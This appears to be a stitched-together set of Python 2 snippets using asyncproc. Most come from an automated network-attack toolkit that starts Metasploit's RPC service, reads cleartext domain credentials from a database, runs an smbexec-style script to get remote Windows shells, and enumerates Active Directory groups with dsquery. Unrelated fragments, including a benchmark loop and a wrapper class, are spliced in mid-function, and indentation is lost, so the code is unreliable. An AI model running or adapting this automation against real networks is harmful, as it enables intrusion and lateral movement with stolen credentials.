def startMetasploit(self, username, password, port):
print "starting metasploit ..."
gotConsole = False
rpcStarted = False
rpcRunning = False
self.metasploitProcess = asyncproc.Process(
"msfconsole -m software/metasploit/modules/".split())
startTime = time.time()
while not rpcRunning:
if time.time() - startTime >= 60:
print "timeout.will try again"
break
poll = self.metasploitProcess.wait(os.WNOHANG)
if poll is not None:
# break
time.sleep(1)
out = self.metasploitProcess.read()
gotConsole = False
if out != "":
# print out.strip()
# if repr(out) == repr("\x1b[4mmsf\x1b[0m \x1b[0m> "):
if repr(out).find(repr("\x1b[4mmsf\x1b[0m \x1b[0m> ")) != -1:
gotConsole = True
if rpcStarted is True:
if out.find("Successfully loaded plugin: msgrpc") != -1:
rpcRunning = True
if gotConsole is True:
if rpcStarted is False:
time.sleep(1)
self.metasploitProcess.write(
"load msgrpc User={0} Pass={1} ServerPort={2}\n".
format(username, password, port))
rpcStarted = True
if rpcRunning is True:
print "metasploit running on 127.0.0.1:{0} with creds {1}:{2}".format(
port, username, password)
else:
print "there was a error starting the metasploit console"
try:
self.metasploitProcess.kill(0)
except:
pass
def GetProcess(params, domain, username, password, host):
proc = None
#try:
if True:
proc = asyncproc.Process([
"./software/adsmbexec.py",
"{}/{}:{}@{}".format(domain, username, password, host)
])
params.log("./software/adsmbexec.py {}/{}:{}@{}".format(
domain, username, password, host))
runWithDifferentUser = False
gotShell = False
startTime = time.time()
while True:
poll = proc.wait(os.WNOHANG)
out = proc.read()
time.sleep(0.25)
if time.time() - startTime >= 60:
#print "too much time has passed. quitting"
#log = log + "too much time has passed. quitting" + "\r\n"
#params.log("too much time has passed. quitting")
break
if out != "":
print out
if out.find("Windows") > -1:
gotShell = True
break
elif out.find("SMB SessionError") > -1:
proc = None
break
elif out.find("The target principal name is incorrect") > -1:
runWithDifferentUser = True
elif out.find(
"'dsquery' is not recognized as an internal or external command"
) > -1:
runWithDifferentUser = True
return proc
def __init__(self, cmd, env=None):
self.process = asyncproc.Process(cmd,
stderr=file("/dev/null", "w"),
env=env or {})
self._read_buffer = ""
'--args',
dest='args',
help='Command line arguments to pass to --executable')
parser.add_option('-n',
'--num_trials',
type='int',
default=10000,
dest='num_trials',
help='The number of iterations to run')
(options, args) = parser.parse_args()
process_args = [
options.executable,
]
process_args.extend(options.args.split(' '))
process = asyncproc.Process(process_args)
line = ''
while not line.strip() == 'READY':
line = process.read()
line = ''
start = datetime.datetime.now()
for i in xrange(options.num_trials):
process.write('GO\n')
found_ready = False
while not found_ready:
data = process.read()
# Note: This isn't very robust. If a read returns part of the READY
# token (e.g. REA) we don't buffer it and won't notice when the rest of
# the token appears next time.
def run(params):
sql = """
select
d.id,
hd.ip_address,
dc.domain, dc.username, dc.cleartext_password,
m.id
from
domains d
join domain_credentials dc on d.domain_name = dc.domain
join domain_credentials_map m on m.domain_credentials_id = dc.id
join host_data hd on m.host_data_id = hd.id
where
d.footprint_id = dc.footprint_id and
d.footprint_id = hd.footprint_id and
d.footprint_id = m.footprint_id and
m.valid = true and
d.info_gathered = false and
m.psexec_failed = false and
m.dgu_failed = false and
d.id not in (select item_identifier from task_list where task_descriptions_id = 20 and footprint_id = %s and in_progress = true) and
hd.footprint_id = %s order by username limit 1
"""
cursor = params.db.cursor()
cursor.execute(sql, (params.footprint_id, params.footprint_id, ))
row = cursor.fetchone()
cursor.close()
if row != None:
cursor = params.db.cursor()
cursor.execute("select addTaskListItem(%s, 20, %s, true, false)", (params.footprint_id, row[0], ))
task_id = cursor.fetchone()[0]
cursor.close()
log = ""
cmd = "./software/adsmbexec.py {}/{}:{}@{}".format(row[2],row[3],row[4],row[1])
params.log(cmd)
proc = asyncproc.Process(["./software/adsmbexec.py", "{}/{}:{}@{}".format(row[2],row[3],row[4],row[1])])
runWithDifferentUser = False
gotShell = False
startTime = time.time()
while True:
poll = proc.wait(os.WNOHANG)
out = proc.read()
time.sleep(0.25)
if time.time() - startTime >= 60:
#print "too much time has passed. quitting"
log = log + "too much time has passed. quitting" + "\r\n"
params.log("too much time has passed. quitting")
break
if out != "":
#print out
log = log + out + "\r\n"
params.log(out)
if out.upper().find("Windows".upper()) > -1:
gotShell = True
break
elif out.upper().find("STATUS_SHARING_VIOLATION".upper()) > -1:
proc = None
runWithDifferentUser = True
break
elif out.upper().find("SMB SessionError".upper()) > -1:
proc = None
runWithDifferentUser = True
break
elif out.upper().find("rpc_x_bad_stub_data".upper()) > -1:
proc = None
runWithDifferentUser = True
break
elif out.upper().find("Unexpected answer from server".upper()) > -1:
proc = None
runWithDifferentUser = True
break
elif out.upper().find("The target principal name is incorrect".upper()) > -1:
runWithDifferentUser = True
# TODO update this host, set psexec_failed = true
elif out.upper().find("'dsquery' is not recognized as an internal or external command".upper()) > -1:
runWithDifferentUser = True
if runWithDifferentUser:
cursor = params.db.cursor()
cursor.execute("update domain_credentials_map set dgu_failed = true where id = %s", (row[5], ))
cursor.close()
if gotShell:
out = runCmd(proc, "dsquery group -limit 0")
#for l in runCmd(proc, "dsquery group -limit 0").split("\n"):
for l in out.split("\n"):
#group = l.split(",")[0].split("=")[1],
#print l
log = log + l + "\r\n"
params.log(l)
if l.find("'dsquery' is not recognized as an internal or external command") != -1:
runWithDifferentUser = True
break
if l != "":
if l.split(",")[0].split("=")[1].find("{") == -1:
#print "group [{}]".format(l.split(",")[0].split("=")[1],)
cursor = params.db.cursor()
cursor.execute("select addDomainGroup(%s, %s, %s)", (params.footprint_id, row[0], l.split(",")[0].split("=")[1], ))
cursor.close()
else:
break
time.sleep(0.5)
proc.write("exit\n")
time.sleep(2)
if runWithDifferentUser == True:
cursor = params.db.cursor()
cursor.execute("update domain_credentials_map set dgu_failed = true where id = %s", (row[5], ))
cursor.close()
#print "output [{}]".format(out)
if out is not "":
if not runWithDifferentUser:
spCursor = params.db.cursor()
spCursor.execute("update domains set info_gathered = true where id = %s", (row[0], ))
spCursor.close()
final_output = ""
while params.log_queue.empty() == False:
final_output += "{0}\r\n".format(params.log_queue.get(False))
final_output = final_output[:-2]
spCursor = params.db.cursor()
spCursor.execute("select updateTaskStatus(%s, %s, %s, %s)", ( task_id, False, True, base64.b64encode(final_output), ))
spCursor.close()
def __call__(self, *args, **kwargs): #p = subprocess.Popen([self.execPath] + args, stdout=subprocess.PIPE, stderr=subprocess.PIPE) p = asyncproc.Process([self.execPath] + list(args)) return Pipes(i=p.stdin, out=p.stdout, err=p.stderr)
def GetProcess(params, domain, username, password, host, map_id):
proc = None
#try:
if True:
proc = asyncproc.Process([
"./software/adsmbexec.py",
"{}/{}:{}@{}".format(domain, username, password, host)
])
runWithDifferentUser = False
gotShell = False
startTime = time.time()
while True:
poll = proc.wait(os.WNOHANG)
out = proc.read()
time.sleep(0.25)
if time.time() - startTime >= 60:
#print "too much time has passed. quitting"
#log = log + "too much time has passed. quitting" + "\r\n"
#params.log("too much time has passed. quitting")
break
if out != "":
print out
if out.upper().find("Windows".upper()) > -1:
gotShell = True
break
elif out.upper().find("STATUS_SHARING_VIOLATION".upper()) > -1:
proc = None
runWithDifferentUser = True
break
elif out.upper().find("SMB SessionError".upper()) > -1:
proc = None
runWithDifferentUser = True
break
elif out.upper().find("rpc_x_bad_stub_data".upper()) > -1:
proc = None
runWithDifferentUser = True
break
elif out.upper().find(
"Unexpected answer from server".upper()) > -1:
proc = None
runWithDifferentUser = True
break
elif out.upper().find(
"The target principal name is incorrect".upper()) > -1:
runWithDifferentUser = True
# TODO update this host, set psexec_failed = true
elif out.upper(
).find("'dsquery' is not recognized as an internal or external command"
.upper()) > -1:
runWithDifferentUser = True
if runWithDifferentUser:
cursor = params.db.cursor()
cursor.execute(
"update domain_credentials_map set dgu_failed = true where id = %s",
(map_id, ))
cursor.close()
return proc